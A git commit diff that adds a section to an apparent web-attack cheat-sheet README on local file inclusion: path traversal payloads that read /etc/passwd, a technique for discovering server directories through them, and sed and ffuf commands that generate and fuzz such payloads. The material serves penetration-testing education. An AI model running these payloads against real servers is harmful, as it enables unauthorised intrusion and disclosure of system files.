Update README.md
This commit is contained in:
parent
abb9bcb43f
commit
211fa80c12
@ -109,6 +109,35 @@ Maybe the back-end is checking the folder path:
|
||||
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
|
||||
```
|
||||
|
||||
### Identifying folders on a server
|
||||
|
||||
Depending on the applicative code / allowed characters, it might be possible to recursively explore the file system by discovering folders and not just files. In order to do so:
|
||||
- identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux):
|
||||
```
|
||||
http://example.com/index.php?page=../../../etc/passwd # depth of 3
|
||||
````
|
||||
- try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`:
|
||||
```
|
||||
http://example.com/index.php?page=private/../../../../etc/passwd # we went deeper down one level, so we have to go 3+1=4 levels up to go back to /etc/passwd
|
||||
```
|
||||
- if the application is vulnerable, there might be two different outcomes to the request:
|
||||
- if you get an error / no output, the `private` folder does not exist at this location
|
||||
- if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory
|
||||
|
||||
- the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively.
|
||||
|
||||
It is possible to adapt this technique to find directories at any location in the file system. For instance, if, under the same hypothesis (current directory at depth 3 of the file system) you want to check if `/var/www/` contains a `private` directory, use the following payload:
|
||||
```
|
||||
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
|
||||
```
|
||||
|
||||
The following sequence of commands allows the generation of payloads using `sed` (1) as input for url fuzzing tools such as `ffuf` (2):
|
||||
```
|
||||
$ sed 's_^_../../../var/www/_g' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt | sed 's_$_/../../../etc/passwd_g' > payloads.txt
|
||||
$ ffuf -u http://example.com/index.php?page=FUZZ -w payloads.txt -mr "root"
|
||||
```
|
||||
Of course, adapt there payloads to your needs in terms of depth / location / input directory list.
|
||||
|
||||
### **Path truncation**
|
||||
|
||||
Bypass the append of more chars at the end of the provided string (bypass of: $\_GET\['param']."php")
|
||||
|
Loading…
Reference in New Issue
Block a user